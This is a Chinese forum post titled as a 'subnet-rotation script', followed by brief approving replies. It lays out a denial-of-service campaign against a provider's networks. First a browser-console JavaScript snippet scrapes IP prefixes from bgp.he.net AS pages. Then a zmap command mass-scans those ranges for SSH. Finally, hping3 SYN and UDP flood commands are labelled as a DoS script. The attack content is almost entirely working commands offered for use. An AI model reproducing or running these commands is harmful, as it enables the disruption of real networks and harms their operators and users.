V.PS轮段脚本

61次阅读

共计 908 个字符,预计需要花费 3 分钟才能阅读完成。

内容最后由 gzchenjz 于 2023-5-10 23:18 编辑 https://bgp.he.net/AS949#_prefixeshttps://bgp.he.net/AS4785#_prefixeshttps://bgp.he.net/AS3214#_prefixeshttps://bgp.he.net/AS6233#_prefixeshttps://bgp.he.net/AS8888#_prefixeshttps://bgp.he.net/AS9312#_prefixeshttps://bgp.he.net/AS23959#_prefixeshttps://bgp.he.net/AS43357#_prefixesF12 控制台输入下面代码采集 IP 段到剪贴板 var tmp = \’\’$(\’tr a\’).each(function(){    var a = $(this)[0];    if(a.href.startsWith(\’https://bgp.he.net/net/\’)) {        tmp += a.text + \’\\n\’;        console.log(a.text);    }});copy(tmp); 复制代码 IP 段保存到 ips.txt,ZMAP 扫描:apt install -y zmapzmap -p 22 -o p22.txt -w ips.txt 复制代码 DOS 脚本 apt install -y hping3# synhping3 -p 22 -S –flood -V x.x.x.1# udp 小包 hping3 -2 -p 53 –flood -V xxx# udp 大包(1400 改成机器 mtu)hping3 -2 -p 53 -d 1400 –flood -V x.x.x.1 复制代码 Rick 2023-05-10 23:16 2 顶上去 doudoudoubao 2023-05-10 23:16 3 绑定 Kaze_Kaze 2023-05-10 23:17 4 支持 166 2023-05-10 23:17 5 火钳刘明。ALPP 2023-05-10 23:18 6 上任鹅城!? syscc 2023-05-10 23:18 7 真滴 6 wwrroopp123 2023-05-10 23:18 8 正义的使者

正文完
 0